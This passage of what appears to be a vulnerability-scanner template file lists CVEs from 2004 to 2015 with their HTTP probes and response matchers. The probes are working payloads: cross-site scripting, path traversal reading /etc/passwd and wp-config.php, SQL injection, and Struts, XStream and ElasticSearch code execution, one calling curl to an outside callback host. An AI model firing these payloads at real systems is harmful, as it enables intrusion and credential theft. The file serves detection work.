Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test\"\n    }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n    \"type\": \"fs\",\n    \"settings\": {\n        \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n    }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9323","info":{"name":"404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"404-to-301\")"],"condition":"and"}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File 